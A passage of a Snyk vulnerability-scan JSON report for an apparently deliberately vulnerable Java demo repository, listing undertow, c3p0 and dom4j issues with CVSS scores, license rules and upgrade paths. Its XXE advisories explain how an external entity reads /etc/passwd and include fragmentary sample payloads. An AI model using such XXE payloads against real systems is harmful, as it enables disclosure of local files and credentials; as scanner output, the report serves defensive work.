"instructions": "" - }, - "LGPL-3.0": { - "licenseType": "LGPL-3.0", - "severity": "medium", - "instructions": "" - }, - "MPL-1.1": { - "licenseType": "MPL-1.1", - "severity": "medium", - "instructions": "" - }, - "MPL-2.0": { - "licenseType": "MPL-2.0", - "severity": "medium", - "instructions": "" - }, - "MS-RL": { - "licenseType": "MS-RL", - "severity": "medium", - "instructions": "" - }, - "SimPL-2.0": { - "licenseType": "SimPL-2.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.1": { - "licenseType": "LGPL-2.1", - "severity": "medium", - "instructions": "" - } - } - }, - "packageManager": "maven", - "ignoreSettings": { - "adminOnly": false, - "reasonRequired": true, - "disregardFilesystemIgnores": false - }, - "summary": "21 vulnerable dependency paths", - "remediation": { - "unresolved": [ - { - "id": "SNYK-JAVA-IOUNDERTOW-7433721", - "title": "Memory Leak", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "low", - "cvssScore": 2.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437", - "title": "Red Hat Bugzilla Bug" - }, - { - "url": "https://access.redhat.com/errata/RHSA-2024:4392", - "title": "Red Hat Security Advisory" - }, - { - "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562", - "title": "Vulnerable Code" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N", - "assigner": "Snyk", - "severity": "low", - "baseScore": 2.3, - "cvssVersion": "4.0", - "modificationTime": "2024-07-10T14:39:24.891744Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "low", - "baseScore": 3.1, - "cvssVersion": "3.1", - "modificationTime": "2024-07-10T14:39:24.891744Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n", - "epssDetails": { - "percentile": "0.16001", - "probability": "0.00045", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2024-3653" - ], - "CWE": [ - "CWE-401" - ], - "GHSA": [ - "GHSA-ch7q-gpff-h9hp" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2024-07-10T07:43:42.505449Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-07-09T00:31:40Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2024-07-10T14:39:24.891304Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-07-10T14:39:24.891744Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final", - "severityWithCritical": "low" - } - ], - "upgrade": { - "com.unboundid:unboundid-ldapsdk@3.1.1": { - "upgradeTo": "com.unboundid:unboundid-ldapsdk@4.0.5", - "upgrades": [ - "com.unboundid:unboundid-ldapsdk@3.1.1" - ], - "vulns": [ - "SNYK-JAVA-COMUNBOUNDID-32143" - ] - }, - "commons-collections:commons-collections@3.1": { - "upgradeTo": "commons-collections:commons-collections@3.2.2", - "upgrades": [ - "commons-collections:commons-collections@3.1", - "commons-collections:commons-collections@3.1", - "commons-collections:commons-collections@3.1" - ], - "vulns": [ - "SNYK-JAVA-COMMONSCOLLECTIONS-30078", - "SNYK-JAVA-COMMONSCOLLECTIONS-472711", - "SNYK-JAVA-COMMONSCOLLECTIONS-6056408" - ] - }, - "io.undertow:undertow-core@2.2.13.Final": { - "upgradeTo": "io.undertow:undertow-core@2.3.8.Final", - "upgrades": [ - "io.undertow:undertow-core@2.2.13.Final", - "io.undertow:undertow-core@2.2.13.Final", - "io.undertow:undertow-core@2.2.13.Final", - "io.undertow:undertow-core@2.2.13.Final", - "org.jboss.xnio:xnio-api@3.8.4.Final", - "org.jboss.xnio:xnio-api@3.8.4.Final", - "io.undertow:undertow-core@2.2.13.Final", - "io.undertow:undertow-core@2.2.13.Final", - "io.undertow:undertow-core@2.2.13.Final", - "io.undertow:undertow-core@2.2.13.Final", - "io.undertow:undertow-core@2.2.13.Final", - "io.undertow:undertow-core@2.2.13.Final", - "io.undertow:undertow-core@2.2.13.Final" - ], - "vulns": [ - "SNYK-JAVA-IOUNDERTOW-7433720", - "SNYK-JAVA-IOUNDERTOW-7300152", - "SNYK-JAVA-IOUNDERTOW-7300153", - "SNYK-JAVA-IOUNDERTOW-7361775", - "SNYK-JAVA-ORGJBOSSXNIO-2994360", - "SNYK-JAVA-ORGJBOSSXNIO-6403375", - "SNYK-JAVA-IOUNDERTOW-6567186", - "SNYK-JAVA-IOUNDERTOW-6669948", - "SNYK-JAVA-IOUNDERTOW-3358786", - "SNYK-JAVA-IOUNDERTOW-3339519", - "SNYK-JAVA-IOUNDERTOW-2871356", - "SNYK-JAVA-IOUNDERTOW-3012383", - "SNYK-JAVA-IOUNDERTOW-2391283" - ] - }, - "org.apache.logging.log4j:log4j-core@2.15.0": { - "upgradeTo": "org.apache.logging.log4j:log4j-core@2.17.1", - "upgrades": [ - "org.apache.logging.log4j:log4j-core@2.15.0", - "org.apache.logging.log4j:log4j-core@2.15.0", - "org.apache.logging.log4j:log4j-core@2.15.0" - ], - "vulns": [ - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", - "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014" - ] - } - }, - "patch": {}, - "ignore": {}, - "pin": {} - }, - "filesystemPolicy": false, - "filtered": { - "ignore": [], - "patch": [] - }, - "uniqueCount": 21, - "projectName": "io.snyk:log4shell-server", - "foundProjectCount": 7, - "displayTargetFile": "log4shell-goof/log4shell-server/pom.xml", - "hasUnknownVersions": false, - "path": "/Users/austindoll/Documents/GitHub/java-goof" - }, - { - "vulnerabilities": [], - "ok": true, - "dependencyCount": 3, - "org": "austin.doll", - "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", - "isPrivate": true, - "licensesPolicy": { - "severities": {}, - "orgLicenseRules": { - "AGPL-1.0": { - "licenseType": "AGPL-1.0", - "severity": "high", - "instructions": "" - }, - "AGPL-3.0": { - "licenseType": "AGPL-3.0", - "severity": "high", - "instructions": "" - }, - "Artistic-1.0": { - "licenseType": "Artistic-1.0", - "severity": "medium", - "instructions": "" - }, - "Artistic-2.0": { - "licenseType": "Artistic-2.0", - "severity": "medium", - "instructions": "" - }, - "CDDL-1.0": { - "licenseType": "CDDL-1.0", - "severity": "medium", - "instructions": "" - }, - "CPOL-1.02": { - "licenseType": "CPOL-1.02", - "severity": "high", - "instructions": "" - }, - "EPL-1.0": { - "licenseType": "EPL-1.0", - "severity": "medium", - "instructions": "" - }, - "GPL-2.0": { - "licenseType": "GPL-2.0", - "severity": "high", - "instructions": "" - }, - "GPL-3.0": { - "licenseType": "GPL-3.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.0": { - "licenseType": "LGPL-2.0", - "severity": "medium", - "instructions": "" - }, - "LGPL-3.0": { - "licenseType": "LGPL-3.0", - "severity": "medium", - "instructions": "" - }, - "MPL-1.1": { - "licenseType": "MPL-1.1", - "severity": "medium", - "instructions": "" - }, - "MPL-2.0": { - "licenseType": "MPL-2.0", - "severity": "medium", - "instructions": "" - }, - "MS-RL": { - "licenseType": "MS-RL", - "severity": "medium", - "instructions": "" - }, - "SimPL-2.0": { - "licenseType": "SimPL-2.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.1": { - "licenseType": "LGPL-2.1", - "severity": "medium", - "instructions": "" - } - } - }, - "packageManager": "maven", - "ignoreSettings": { - "adminOnly": false, - "reasonRequired": true, - "disregardFilesystemIgnores": false - }, - "summary": "No known vulnerabilities", - "filesystemPolicy": false, - "uniqueCount": 0, - "projectName": "io.github.snyk:todolist-mvc", - "foundProjectCount": 7, - "displayTargetFile": "todolist-goof/pom.xml", - "hasUnknownVersions": false, - "path": "/Users/austindoll/Documents/GitHub/java-goof" - }, - { - "vulnerabilities": [ - { - "id": "SNYK-JAVA-C3P0-461017", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1", - "title": "GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:45.369849Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:06.803024Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:09.230623Z" - } - ], - "description": "## Overview\n\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection.\nvia the `extractXmlConfigFromInputStream` in `com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java` during initialization.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\r\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\r\n\r\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\r\n\r\nFor example, below is a sample XML document, containing an XML element- username.\r\n\r\n```xml\r\n\r\n John\r\n\r\n```\r\n\r\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\r\n\r\n```xml\r\n\r\n]>\r\n &xxe;\r\n\r\n```\r\n\r\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n\n## Remediation\n\nThere is no fixed version for `c3p0:c3p0`.\n\n\n## References\n\n- [GitHub Commit](https://github.com/swaldman/c3p0/commit/7dfdda63f42759a5ec9b63d725b7412f74adb3e1)\n", - "epssDetails": { - "percentile": "0.78365", - "probability": "0.00585", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-20433" - ], - "CWE": [ - "CWE-611" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:17:58.383761Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-12-24T13:29:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-07-21T14:22:18Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:09.230623Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2" - }, - { - "id": "SNYK-JAVA-C3P0-461018", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "filePath": "com/mchange/v2/c3p0/cfg/C3P0ConfigXmlUtils.java", - "className": "C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "c3p0:c3p0", - "references": [ - { - "url": "https://hackerone.com/reports/509315", - "title": "POC: Hackerone Report" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 4.4, - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:02:14.895852Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.831457Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 4.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:53.496388Z" - } - ], - "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", - "epssDetails": { - "percentile": "0.90102", - "probability": "0.02457", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-5427" - ], - "CWE": [ - "CWE-776" - ], - "GHSA": [ - "GHSA-84p2-vf58-xhxv" - ] - }, - "packageName": "c3p0:c3p0", - "proprietary": false, - "creationTime": "2019-09-05T16:24:58.914446Z", - "functions_new": [ - { - "version": [ - "[0.9.1,]" - ], - "functionId": { - "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", - "functionName": "extractXmlConfigFromInputStream" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-04-22T22:18:26Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "c3p0", - "artifactId": "c3p0" - }, - "publicationTime": "2019-04-22T22:18:26Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:53.496388Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2" - }, - { - "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", - "type": "license", - "title": "LGPL-3.0 license", - "semver": { - "vulnerable": [ - "[0,)" - ] - }, - "license": "LGPL-3.0", - "language": "java", - "description": "LGPL-3.0 license", - "packageName": "c3p0:c3p0", - "creationTime": "2024-06-18T02:35:42.971Z", - "packageManager": "maven", - "publicationTime": "2024-06-18T02:35:42.971Z", - "severity": "medium", - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "c3p0:c3p0@0.9.1.2" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "c3p0:c3p0", - "version": "0.9.1.2" - }, - { - "id": "SNYK-JAVA-DOM4J-174153", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "credit": [ - "Mario Areias" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/Namespace.java", - "className": "Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/QName.java", - "className": "QName", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/dom4j/dom4j/issues/48", - "title": "GitHub Issue" - }, - { - "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", - "title": "POC: Ihacktoprotect Blog" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "cvssV3BaseScore": 5.3, - "modificationTime": "2024-03-11T09:53:54.900402Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:00:55.789489Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", - "assigner": "SUSE", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:26.800032Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:19.987177Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:54.900402Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", - "epssDetails": { - "percentile": "0.70906", - "probability": "0.00325", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-1000632" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-6pcc-3rfx-4gpm" - ] - }, - "packageName": "dom4j:dom4j", - "proprietary": false, - "creationTime": "2019-04-10T16:07:04.634619Z", - "functions_new": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "className": "org.dom4j.QName", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-07-01T19:12:29Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "dom4j", - "artifactId": "dom4j" - }, - "publicationTime": "2018-08-21T14:16:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.900402Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", - "org.hibernate:hibernate-core@4.3.7.Final", - "dom4j:dom4j@1.6.1" - ], - "upgradePath": [ - false, - "org.hibernate:hibernate-core@5.1.17.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "dom4j:dom4j", - "version": "1.6.1" - }, - { - "id": "SNYK-JAVA-DOM4J-2812975", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Not Defined", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.4, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/a822852", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "cvssV3BaseScore": 7.4, - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:31.083245Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.813214Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.4, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:57.985080Z" - } - ], - "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may 